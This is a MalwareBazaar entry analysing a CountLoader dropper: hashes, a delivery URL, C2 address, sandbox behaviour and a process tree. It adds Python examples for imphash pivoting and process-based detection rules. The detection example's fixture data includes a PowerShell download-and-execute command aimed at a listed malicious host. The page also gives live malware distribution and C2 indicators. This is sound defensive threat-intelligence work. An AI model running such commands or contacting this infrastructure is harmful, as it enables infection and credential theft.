MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



CountLoader


Vendor detections: 12



SHA256 hash: 041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5
SHA3-384 hash: e7613f0a9d1be32789982be6f21afc5fb3dd050b6e5ea4369056fb12d7b1af23413081017ae98373186bccd45e456dfd
SHA1 hash: 5c0a732f1ae17ba470e049689ddb63424aa5f6bf
MD5 hash: 30ce1e4b80da8ded9cdde1be65c2fbd3
humanhash: triple-tennis-oregon-connecticut
File name: Setup_patched.exe
Signature CountLoader
File size: 2'966'144 bytes
First seen: 2026-03-01 12:22:19 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash 4cea7ae85c87ddc7295d39ff9cda31d1 (90 x LummaStealer, 85 x RedLineStealer, 62 x Rhadamanthys)
ssdeep 49152:ClRltyG45DARVitofpdJP+xxUkQH3M9DPf4CguAyHrpllQhvDW:ClE5MCmxd93MloClllQdy
TLSH T17DD52256ADDD54E6DCF443F1909332B20E353C3983BD09AF3598B0295BB2A91CA37B16
TrID 45.6% (.EXE) Microsoft Visual C++ compiled executable (generic) (16529/12/5)
18.0% (.EXE) Win64 Executable (generic) (6522/11/2)
13.9% (.EXE) Win16 NE executable (generic) (5038/12/1)
5.6% (.ICL) Windows Icons Library (generic) (2059/9)
5.6% (.EXE) OS/2 Executable (generic) (2029/13)
Magika pebin
Reporter aachum
Tags:194-76-226-162 37-221-66-27 AsgardProtector CountLoader de-pumped DeepLoad exe explorer-vg
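The imphash above is reported on 90 LummaStealer, 85 RedLineStealer and 62 Rhadamanthys samples besides this CountLoader one. That is expected once you know what the value covers: an import hash is the MD5 of the ordered list of "lib.func" strings from the PE import table, with the DLL name lower-cased and stripped of its .dll/.ocx/.sys extension, the API name lower-cased, and a handful of DLLs' ordinals resolved to names. A packed sample exposes only the packer or loader stub's imports, so samples sharing a stub share an imphash regardless of payload; the value is a pivot for the stub, not a family attribution. The following is an added example, not code from MalwareBazaar or from pefile: it reimplements the algorithm as pefile computes it, on constructed import tables; the ordinal table is a small excerpt and the three "samples" are invented.

```python
import hashlib
from typing import Iterable, Tuple, Union

# Ordinal-to-name tables for DLLs usually imported by ordinal. pefile ships complete
# tables for ws2_32, wsock32 and oleaut32; this is a small excerpt for the example
# (assumption: enough for the demo). Anything unresolved falls back to "ordN".
ORDINAL_NAMES = {
    "ws2_32": {1: "accept", 2: "bind", 3: "closesocket", 4: "connect",
               16: "recv", 19: "send", 23: "socket", 52: "gethostbyname",
               115: "WSAStartup", 116: "WSACleanup"},
    "oleaut32": {2: "SysAllocString", 6: "SysFreeString", 7: "SysStringLen"},
}

Import = Tuple[str, Union[str, int]]  # (DLL name as in the import table, API name or ordinal)


def imphash(imports: Iterable[Import]) -> str:
    """Import hash as pefile computes it: MD5 over the comma-joined, ordered list of
    "lib.func" strings. DLL names are lower-cased and lose a .dll/.ocx/.sys extension,
    API names are lower-cased, ordinals are resolved where a table exists. Order
    matters: the same APIs in a different table order give a different hash."""
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        base, _, ext = lib.rpartition(".")
        if base and ext in ("dll", "ocx", "sys"):
            lib = base
        if isinstance(func, int):
            func = ORDINAL_NAMES.get(lib, {}).get(func, f"ord{func}")
        parts.append(f"{lib}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


# Constructed import tables. STUB stands in for a loader stub's import set; samples A
# and B share it byte-for-byte apart from casing, which is exactly the situation an
# imphash shared across families describes. Sample C has the same APIs in another order.
STUB = [
    ("KERNEL32.DLL", "GetProcAddress"), ("KERNEL32.DLL", "LoadLibraryA"),
    ("KERNEL32.DLL", "VirtualAlloc"), ("KERNEL32.DLL", "VirtualProtect"),
    ("USER32.DLL", "MessageBoxA"), ("WS2_32.DLL", 23), ("WS2_32.DLL", 4),
]
SAMPLE_A = STUB
SAMPLE_B = [(dll.lower(), func) for dll, func in STUB]
SAMPLE_C = list(reversed(STUB))


def pivot_candidates(samples: dict) -> dict:
    """Group sample names by imphash, i.e. what an imphash pivot in MalwareBazaar does."""
    groups: dict = {}
    for name, imports in samples.items():
        groups.setdefault(imphash(imports), []).append(name)
    return groups


if __name__ == "__main__":
    for digest, names in pivot_candidates({"A": SAMPLE_A, "B": SAMPLE_B, "C": SAMPLE_C}).items():
        print(digest, names)
```

When pivoting on the value from this entry, treat every match as "same stub" and confirm the family from unpacked-stage indicators (the C2 socket, the dropped-file names, the YARA hits on process dumps) rather than from the imphash alone.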


iamaachum
https://mlkkiooc.icu/ => https://mega.nz/file/AF8mFIQD#X_HEohVCw74ohDDz3YeLloIvwnKhkjuTuwaRhhgYE2M

C2: 194.76.226.162:7673

Intelligence


File Origin
Number of uploads: 1
Number of downloads: 116
Origin country: ES
Vendor Threat Intelligence
Malware configuration found for: Archives, AutoIt
Details:
Archives: an extracted Cabinet archive from the resources and SFX parameters
Malware family: n/a
ID: 1
File name: Setup_patched.exe
Verdict: Malicious activity
Analysis date: 2026-03-01 12:24:24 UTC
Tags: autoit rat

Note: ANY.RUN is an interactive sandbox; its verdict reflects every action taken during the analysis session, not only the behaviour of the uploaded sample.
Verdict: Malicious
Score: 99.9%
Tags: autoit emotet
Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: adaptive-context at autoit CAB darkgate expand explorer installer installer installer-heuristic lolbin lolbin microsoft_visual_cc overlay packed rundll32 runonce sfx
Result
Verdict: Malicious
File Type: exe x64
Detections: Trojan.Win32.Autoit.sb
Result
Threat name: n/a
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signatures
.NET source code contains potential unpacker
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Detected CypherIt Packer
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suricata IDS alerts for network traffic
Tries to access browser extension known for cryptocurrency wallets
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Writes to foreign memory regions
Yara detected Powershell download and execute
Behaviour
Behavior Graph:
Behavior Graph ID: 1876470
Sample: Setup_patched.exe
Start date: 01/03/2026
Architecture: WINDOWS
Score: 100

Domains resolved during the run: laQKCmPhEzjtRovCAgJpvX.laQKCmPhEzjtRovCAgJpvX, forest-entity.cc, explorer.vg
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 10 other signatures

Process tree (indentation = parent/child; per-process signatures, network contacts and dropped files listed under each process; "N other" entries as reported by the sandbox):

Setup_patched.exe
  - Uses schtasks.exe or at.exe to add and modify task schedules
  cmd.exe
    - Detected CypherIt Packer
    cmd.exe
      - dropped: C:\Users\user\AppData\Local\...\Cardiac.exe (PE32)
      Cardiac.exe
        - Deletes itself after installation
        - Writes to foreign memory regions
        - Injects a PE file into a foreign processes
        - dropped: C:\Users\user\AppData\Local\...\RegAsm.exe (PE32)
        RegAsm.exe
          - connects to 194.76.226.162:7673 from source port 49692 (SERVINGADE, Germany)
          - Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          - Found many strings related to Crypto-Wallets (likely being stolen)
          - Tries to harvest and steal browser information (history, passwords, etc)
          cmd.exe
            - Uses ping.exe to check the status of other devices and networks
            mshta.exe
              - contacts explorer.vg (45.156.87.92, SKYLINKNL, Germany)
              - dropped: C:\Users\user\...\Project_London__29[1].rar (HTML)
              - Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
              - Tries to access browser extension known for cryptocurrency wallets
              - Writes or reads registry keys via WMI
            conhost.exe
          powershell.exe
            - Creates a thread in another existing process (thread injection)
            - Injects a PE file into a foreign processes
            - Powershell drops PE file
            csc.exe
              - dropped: C:\Users\user\AppData\Local\...\vbotxgqs.dll (PE32)
              cvtres.exe
            conhost.exe
          cmd.exe
            PING.EXE
              - contacts 1.0.0.1 (CLOUDFLARENETUS, Australia)
            conhost.exe
          chrome.exe
      cmd.exe
        findstr.exe
      cmd.exe
      2 other processes
    cmd.exe
    conhost.exe
  at.exe
    conhost.exe
mshta.exe
  - Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
  - Bypasses PowerShell execution policy
  - Tries to access browser extension known for cryptocurrency wallets
  - 2 other signatures
mshta.exe
  powershell.exe
    - contacts forest-entity.cc (78.128.114.182, TAMATIYA-ASBG, Bulgaria)
    - dropped: C:\Users\user\Downloads\filemanager.exe (PE32+)
    filemanager.exe
      - contacts 37.221.66.27 (FIRSTDC-ASRU, Russian Federation)
      - Multi AV Scanner detection for dropped file
      - Tries to harvest and steal browser information (history, passwords, etc)
    conhost.exe
  WmiPrvSE.exe
2 other processes
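The graph and signature list above describe a chain that endpoint telemetry sees as a handful of process-creation and network events: at.exe under the dropper, a RegAsm.exe copy running from AppData and talking to 194.76.226.162:7673, mshta.exe spawning powershell.exe with an execution-policy bypass, and csc.exe compiling from a user profile directory (the "Dot net compiler compiles file from suspicious location", "Suspicious MSHTA Child Process" and "Suspicious PowerShell Parameter Substring" Sigma hits). The following is an added example, not code from any sandbox vendor, Sigma or MalwareBazaar: it encodes those observations as detection rules and runs them over constructed Sysmon-style events. PIDs, paths and command lines in the events are invented; only the process names, the dropped-file locations and the C2 socket come from this page, and the event field names are assumptions to be mapped onto your own schema.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the started process
    cmdline: str


@dataclass(frozen=True)
class NetEvent:
    pid: int
    dst_ip: str
    dst_port: int


# Network indicators listed on this page: the C2 socket and the hosts resolved during the run.
IOC_IPS = {"194.76.226.162", "37.221.66.27", "78.128.114.182", "45.156.87.92"}

USER_WRITABLE = re.compile(r"c:\\users\\[^\\]+\\(?:appdata|downloads|desktop)\\", re.I)
# Shortened or abused PowerShell switches (the "Suspicious PowerShell Parameter Substring" idea).
PS_SUSPICIOUS = re.compile(
    r"(?:^|\s)-(?:nop|noni|w(?:in)?\s+hidden|e(?:nc|c)\s|ep\s+bypass|executionpolicy\s+bypass)", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe")
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(procs: List[ProcEvent], nets: List[NetEvent]) -> Dict[str, Set[int]]:
    """Return {rule_name: {pids}} for every rule that fires on the telemetry."""
    by_pid = {p.pid: p for p in procs}
    hits: Dict[str, Set[int]] = {}

    def hit(rule: str, pid: int) -> None:
        hits.setdefault(rule, set()).add(pid)

    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        pname = basename(parent.image) if parent else ""
        # "Uses schtasks.exe or at.exe": at.exe is deprecated and rarely seen legitimately;
        # schtasks /create is only flagged when the parent runs from a user-writable path.
        if name == "at.exe" or (name == "schtasks.exe" and "/create" in p.cmdline.lower()
                                and parent is not None and USER_WRITABLE.search(parent.image)):
            hit("task_scheduling", p.pid)
        # Sigma "Suspicious MSHTA Child Process"
        if pname == "mshta.exe" and name in LOLBIN_CHILDREN:
            hit("mshta_child", p.pid)
        # "Bypasses PowerShell execution policy" and the parameter-substring rule
        if name in ("powershell.exe", "pwsh.exe") and PS_SUSPICIOUS.search(p.cmdline):
            hit("powershell_suspicious_args", p.pid)
        # Sigma "Dot net compiler compiles file from suspicious location": csc.exe spawned by a
        # script host (Add-Type) or reading its response file from a user profile directory.
        if name == "csc.exe" and (pname in SCRIPT_HOSTS or USER_WRITABLE.search(p.cmdline)):
            hit("dotnet_compile_suspicious", p.pid)
        # RegAsm.exe belongs under C:\Windows\Microsoft.NET\; a copy under the user profile is
        # the usual injection host (the graph shows it dropped under AppData\Local).
        if name == "regasm.exe" and USER_WRITABLE.search(p.image):
            hit("regasm_outside_framework_dir", p.pid)

    for n in nets:
        p = by_pid.get(n.pid)
        if n.dst_ip in IOC_IPS:
            hit("known_ioc_contact", n.pid)
        # "Uses known network protocols on non-standard ports", narrowed to binaries running
        # from user-writable paths so the rule stays quiet on ordinary hosts.
        if p is not None and USER_WRITABLE.search(p.image) and n.dst_port not in (80, 443):
            hit("nonstandard_port_from_user_dir", n.pid)
    return hits


# Constructed telemetry approximating the chain in the graph above (invented PIDs, paths and
# command lines); the last three process events and the last network event are benign controls.
PROCS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\Setup_patched.exe", "Setup_patched.exe"),
    ProcEvent(101, 100, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\Cardiac\run.cmd"'),
    ProcEvent(102, 100, r"C:\Windows\System32\at.exe", "at.exe"),
    ProcEvent(103, 101, r"C:\Users\user\AppData\Local\Temp\Cardiac\Cardiac.exe", "Cardiac.exe"),
    ProcEvent(104, 103, r"C:\Users\user\AppData\Local\Temp\Cardiac\RegAsm.exe", "RegAsm.exe"),
    ProcEvent(105, 104, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ping 1.0.0.1 & mshta.exe https://explorer.vg/"),
    ProcEvent(106, 105, r"C:\Windows\System32\mshta.exe", "mshta.exe https://explorer.vg/"),
    ProcEvent(107, 106, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://forest-entity.cc/')\""),
    ProcEvent(108, 107, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbotxgqs\vbotxgqs.cmdline"'),
    ProcEvent(200, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -File C:\ops\inventory.ps1"),
    ProcEvent(201, 1, r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe", "MSBuild.exe app.csproj"),
    ProcEvent(202, 201, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", r"csc.exe /noconfig @C:\src\app\obj\Debug\app.csproj.rsp"),
]
NETS = [
    NetEvent(104, "194.76.226.162", 7673),  # RegAsm.exe -> C2 listed on this page
    NetEvent(106, "45.156.87.92", 443),     # mshta.exe -> explorer.vg
    NetEvent(200, "1.0.0.1", 443),          # benign control
]

if __name__ == "__main__":
    for rule, pids in sorted(detect(PROCS, NETS).items()):
        print(f"{rule:32s} {sorted(pids)}")
```

The IP set is the weakest rule here (infrastructure rotates); the process-relationship rules survive a change of C2 and catch the stub's behaviour regardless of which payload it carries.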
Result
Malware family: n/a
Score: 7/10
Tags: discovery persistence
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Program crash
System Location Discovery: System Language Discovery
Adds Run key to start application
Deletes itself
Executes dropped EXE
Unpacked files
SHA256 hash: 041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5
MD5 hash: 30ce1e4b80da8ded9cdde1be65c2fbd3
SHA1 hash: 5c0a732f1ae17ba470e049689ddb63424aa5f6bf
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: detect_Redline_Stealer
Author: Varp0s

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: CountLoader
File: Executable exe 041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5 (this sample)

Comments